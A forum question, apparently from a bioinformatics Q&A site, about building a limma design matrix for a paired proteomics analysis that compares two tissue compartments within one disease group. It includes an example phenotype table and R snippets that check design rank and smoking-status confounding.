Question

Paired analysis in proteomics data for DE while interested in only a particular subset of the data

svlachavas ▴ 840

@svlachavas-7225

Germany/Heidelberg/German Cancer Resear…

Hello, and a very happy new year to the whole community! I would like to ask a specific question about how to construct an appropriate design matrix when assessing differential protein expression in a DDA proteomics experiment. For clarity and reproducibility, I have constructed an artificial data table that replicates the necessary phenotypic information:


phenotypic_data
# A tibble: 8 × 5
  Sample_Name SampleID Compartment  Disease Smoking_status
  <chr>          <dbl> <chr>        <chr>   <chr>         
1 Sample_1           1 CompartmentA GroupA  Smoker        
2 Sample_2           1 CompartmentB GroupA  Smoker        
3 Sample_3           2 CompartmentA GroupA  Non-Smoker    
4 Sample_4           2 CompartmentB GroupA  Non-Smoker    
5 Sample_5           3 CompartmentA GroupA  Ex-smoker     
6 Sample_6           3 CompartmentB GroupA  Ex-smoker     
7 Sample_7           4 CompartmentB GroupB  Smoker        
8 Sample_8           5 CompartmentB GroupB  Non-Smoker
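For anyone who wants to reproduce this, the table above could be rebuilt roughly as follows. This is only a sketch: it uses a base R `data.frame` rather than a tibble, and the helper names `samples_per_patient` and `paired_ids` are introduced purely for illustration.

```r
# Rebuild the example phenotype table (base R data.frame instead of a tibble)
phenotypic_data <- data.frame(
  Sample_Name    = paste0("Sample_", 1:8),
  SampleID       = c(1, 1, 2, 2, 3, 3, 4, 5),
  Compartment    = c("CompartmentA", "CompartmentB", "CompartmentA", "CompartmentB",
                     "CompartmentA", "CompartmentB", "CompartmentB", "CompartmentB"),
  Disease        = c(rep("GroupA", 6), rep("GroupB", 2)),
  Smoking_status = c("Smoker", "Smoker", "Non-Smoker", "Non-Smoker",
                     "Ex-smoker", "Ex-smoker", "Smoker", "Non-Smoker"),
  stringsAsFactors = FALSE
)

# Count samples per patient and collect the IDs that have a matched pair
samples_per_patient <- table(phenotypic_data$SampleID)
paired_ids <- names(samples_per_patient)[samples_per_patient == 2]

print(samples_per_patient)
print(paired_ids)
```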

As you can see, Compartment is a categorical variable denoting which of two distinct tissue compartments a sample comes from. Disease is also a binary categorical variable, indicating which of two distinct diseases the sample belongs to. The last column, Smoking_status, records the smoking status of each individual. Most importantly, the SampleID column identifies the patient: 3 patients have matched samples, that is, one CompartmentA and one matched CompartmentB sample from the same individual.

Our main goal is to compare CompartmentA vs CompartmentB within the GroupA disease condition. As the table shows, all patients with matched samples belong to GroupA, while the 2 remaining individuals (both GroupB) each have only a single, unmatched CompartmentB sample. Given this, what would be the best way to construct the design matrix, considering that we are essentially not interested in the last 2 samples? For example:


combo_condition <- factor(paste(phenotypic_data$Compartment, phenotypic_data$Disease, sep="_"))
pairs <- factor(phenotypic_data$SampleID)

design <- model.matrix(~0 + combo_condition+pairs)
# then proceed with contrasts.matrix specifying the comparison of interest {CompartmentA_GroupA vs CompartmentB_GroupA}

And then proceed with makeContrasts and specify our comparison of interest?

Or would the SampleID term be a problem, since two individuals (the last two rows) have no matched samples? The alternative would be to remove these samples completely, which, however, could lead to a loss of biological information.
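To make the two options concrete, here is a rough base R sketch that compares the rank of the design built on all 8 samples with a design restricted to the paired GroupA samples. The object names (`design_full`, `design_sub`, `contrast_AvsB`, `keep`) are only illustrative, and the estimability check (does adding the contrast as an extra row change the rank?) is a generic linear-algebra test, not a limma function.

```r
# Phenotype columns from the example table
sample_id   <- c(1, 1, 2, 2, 3, 3, 4, 5)
compartment <- c("CompartmentA", "CompartmentB", "CompartmentA", "CompartmentB",
                 "CompartmentA", "CompartmentB", "CompartmentB", "CompartmentB")
disease     <- c(rep("GroupA", 6), rep("GroupB", 2))

# Option 1: all samples, combined condition plus patient blocking factor
combo_condition <- factor(paste(compartment, disease, sep = "_"))
pairs           <- factor(sample_id)
design_full     <- model.matrix(~0 + combo_condition + pairs)
rank_full       <- qr(design_full)$rank
cat("full design: columns =", ncol(design_full), "rank =", rank_full, "\n")

# CompartmentA_GroupA minus CompartmentB_GroupA (first two columns of design_full)
contrast_AvsB <- c(1, -1, rep(0, ncol(design_full) - 2))
# A contrast is estimable if it lies in the row space of the design,
# i.e. appending it as a row does not increase the rank
estimable <- qr(rbind(design_full, contrast_AvsB))$rank == rank_full
cat("A vs B within GroupA estimable:", estimable, "\n")

# Option 2: keep only patients that contribute two samples
keep       <- ave(sample_id, sample_id, FUN = length) == 2
design_sub <- model.matrix(~ factor(compartment[keep]) + factor(sample_id[keep]))
rank_sub   <- qr(design_sub)$rank
cat("paired-only design: columns =", ncol(design_sub), "rank =", rank_sub, "\n")
```

In this toy table the GroupB column equals the sum of the indicator columns for patients 4 and 5, so the full design has one more column than its rank, whereas the paired-only design is full rank. Whether the unmatched samples still help in a real dataset (for example, through variance estimation) is not something this sketch can tell.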

Finally, if one also wanted to take Smoking_status into account, should it be included in the design matrix as a confounder? Or, because this is essentially a paired analysis, is there no rationale for including it?
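One way to look at the smoking question on this example table is to check whether Smoking_status adds any independent columns once the patient factor is in the model. The sketch below does this with base R only, restricted to the six paired samples; `design_paired` and `design_smoking` are illustrative names, and the result applies to this toy layout, where each patient has a single smoking status.

```r
# Paired GroupA samples only (patients 1-3 from the example table)
patient     <- factor(c(1, 1, 2, 2, 3, 3))
compartment <- factor(rep(c("CompartmentA", "CompartmentB"), times = 3))
smoking     <- factor(c("Smoker", "Smoker", "Non-Smoker", "Non-Smoker",
                        "Ex-smoker", "Ex-smoker"))

# Paired design without and with the smoking covariate
design_paired  <- model.matrix(~ compartment + patient)
design_smoking <- model.matrix(~ compartment + patient + smoking)

rank_paired  <- qr(design_paired)$rank
rank_smoking <- qr(design_smoking)$rank

cat("paired design:  columns =", ncol(design_paired),  "rank =", rank_paired,  "\n")
cat("with smoking:   columns =", ncol(design_smoking), "rank =", rank_smoking, "\n")
```

Here the rank does not increase when smoking is added, because a covariate that is constant within each patient is a linear combination of the patient columns.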

Thanks a gazillion,

Efstathios

limma modelmatrix pairedanalysis Proteomics
